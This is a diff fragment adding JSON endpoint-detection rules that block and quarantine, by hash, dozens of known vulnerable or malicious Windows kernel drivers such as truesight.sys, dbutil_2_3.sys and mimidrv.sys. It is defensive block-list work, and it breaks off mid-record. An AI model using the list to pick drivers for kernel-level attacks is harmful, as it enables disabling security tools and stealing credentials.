+ "last_update": "2026-03-23T11:45:31.472525Z",
+ "creation_date": "2026-03-23T11:45:31.472528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3437986f500aa26ced21951972a96f9140f50d9ddb33e2f7b84f8ac105ca3bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca4c451e-ec0a-58b7-8304-d70e67ec5fb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494302Z",
+ "creation_date": "2026-03-23T11:45:31.494305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494313Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81b89074775eed6ce5b826ba2ebbe54ce0bfabb28c46395f5ac6c4dbce802fa3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca63ff5f-a596-5194-95ed-dcfa9cc8496d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146674Z",
+ "creation_date": "2026-03-23T11:45:32.146676Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02576ccba2ff02ec564bef476ac55a92a16222d63c97550fb3d780f5c3de17f5",
+ "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/0144dbef-1da8-406c-8e35-7afee57dc471/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca68401c-89d2-5dd2-9263-00344fe2c3f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155084Z",
+ "creation_date": "2026-03-23T11:45:31.155086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c0618b18970ec645aa2ac31a8d76a28ca0ca8060bb9880002c58df4963ab857",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca6d8802-8255-5fbd-8315-adc787e10db8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611132Z",
+ "creation_date": "2026-03-23T11:45:29.611134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90f5962e6b2342eae05dc8f4c34d5291742537248587ccf6ac298691806a4517",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca8d5d50-acee-52d5-a034-debb9cd72d9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482856Z",
+ "creation_date": "2026-03-23T11:45:31.482860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482895Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee538988ff0a01845273de3c6ea3d822154314d017e58c0c93381466461448bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "caa2f197-be4d-54a6-b465-7cc2dcde4c90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816449Z",
+ "creation_date": "2026-03-23T11:45:31.816452Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b690ce513c1f2603e4184d4ea33d54210f6056b0103987ec4d1c57b351e7d7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "caa9eef9-0b8d-5d6c-aca8-2cf2efac859f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811471Z",
+ "creation_date": "2026-03-23T11:45:31.811473Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a52d30f821736d913228ed911b309da51e5445cfc239ea95ab1c5e6ae4dd82b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cab74255-8527-55cc-85c2-73328bd0eb4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620423Z",
+ "creation_date": "2026-03-23T11:45:29.620425Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620431Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cac26e01-bde2-5065-84b3-bb35025f54ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459021Z",
+ "creation_date": "2026-03-23T11:45:30.459024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459033Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18b923b169b2c3c7db5cbfda0db0999f04adb2cf6c917e5b1fb2ff04714ecac1",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cad34b53-da2e-5122-983b-b0367bd4ca01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977356Z",
+ "creation_date": "2026-03-23T11:45:29.977358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977364Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25a344cde4ba47efa3654afb5225f4a8f569f54f6c4448c00eb9fbd644fb96ca",
+ "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cad995d3-c4e7-5d93-af71-069fab3efba2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982379Z",
+ "creation_date": "2026-03-23T11:45:29.982381Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb5ebba562c33ef2ed93558913792726c8c2e5898531923589122ae31db64ebb",
+ "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cae007a8-87fc-5835-824f-35da2c195565",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808534Z",
+ "creation_date": "2026-03-23T11:45:31.808537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "099231d77895db5f1eb1018de0d2abf269353d7bc14e8ea2145c1fa662fee491",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cae93d5f-1ba1-5e1d-bfb3-d935abeb1f49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499028Z",
+ "creation_date": "2026-03-23T11:45:31.499031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63bb289bed7e5f60bdaf7a065f5e54e1ccec7a6148cd668f97705706bf2e0dea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "caf15fec-e693-5f15-99cf-57f7813e49e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147183Z",
+ "creation_date": "2026-03-23T11:45:31.147185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36883ef1e53bb69e576c045971ff329c01e0c636e283c642c5790102e4f58fa0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb014e14-cbdf-5069-b095-29d3d9325c71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470132Z",
+ "creation_date": "2026-03-23T11:45:30.470135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbc1543100df83a08f3ee9476cde83db616f610917cd4bf5ecaafad46b6f7e23",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb0f47fd-98d5-5e67-8c74-362489d4d335",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150211Z",
+ "creation_date": "2026-03-23T11:45:31.150213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d110ef3acecc45b23c4d538a1b0389c7b0ad9deeb584316b55a4621d8168bac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb0febac-eb1b-5a1c-9020-65353a19b457",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145056Z",
+ "creation_date": "2026-03-23T11:45:32.145059Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145064Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "402318361c6069fc4c8a6f31b6f81921a1116426e9e4504ddb7363f26ff4d9c8",
+ "comment": "Vulnerable Kernel Driver (aka dellinstrumentation.sys) [https://www.loldrivers.io/drivers/86b9c8d6-9c59-4fd4-befd-ab9a36a19e36/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb101e66-8a78-5f12-8e2f-d1b4c854a12c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607222Z",
+ "creation_date": "2026-03-23T11:45:29.607224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ec25c3698a5dbcca4cf6cf7f84b6fc51968d4d150605dd36c86452bda81f3bb",
+ "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb107958-08be-5be5-a61f-6b3efa89ae6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473038Z",
+ "creation_date": "2026-03-23T11:45:30.473041Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef1abc77f4000e68d5190f9e11025ea3dc1e6132103d4c3678e15a678de09f33",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb171a55-85b7-5638-8c5f-42fdcc982b6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456451Z",
+ "creation_date": "2026-03-23T11:45:30.456455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0209934453e9ce60b1a5e4b85412e6faf29127987505bfb1185fc9296c578b09",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb223633-f3a4-5386-ae2e-00b7c1b74f6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819956Z",
+ "creation_date": "2026-03-23T11:45:30.819958Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1848cb34d16559e3c8232c369d89fc12b5720b58300d8c4c21dade6e3ea8d585",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb241825-b066-5264-a029-4a311283b3e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976679Z",
+ "creation_date": "2026-03-23T11:45:29.976681Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
